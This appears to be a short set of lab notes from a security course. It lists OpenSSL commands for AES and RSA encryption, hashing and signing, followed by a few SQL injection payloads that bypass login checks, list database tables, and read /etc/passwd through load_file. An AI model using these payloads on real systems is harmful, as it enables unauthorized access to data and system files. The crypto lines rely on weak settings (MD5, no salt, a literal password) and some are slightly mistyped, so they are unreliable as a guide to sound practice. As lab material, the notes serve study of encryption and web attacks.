openssl aes-128-cbc -e -in plain.txt -out cipher.bin -k "password" -nosalt
openssl aes-128-cbc -d -in cipher1.bin -out pt.txt -k "password" –nosalt
avalanche
openssl genrsa –out pvtkey.pem
openssl rsa -pubout -in pvtkey.pem -out pubkey.pem
openssl rsa -text -in pvtkey.pem
openssl rsautl -encrypt -in plain.txt -pubin -inkey pubkey.pem -out c1.bin
openssl rsautl -decrypt -in c1.bin -inkey pvtkey.pem -out dec1.txt
openssl md5 plain.txt
Openssl SHA256 plain.txt
openssl dgst -sha1 -sign pvtkey.pem -out s.bin plain.txt
openssl dgst -sha1 -verify pubkey.pem -signature s.bin plain.txt

1
1'or'1'='1
'union select null,@@hostname#
'union select load_file('/etc/passwd'),null#
1 or 1=1 union select null, table_name from information_schema.tables#
1 union select null,@@version#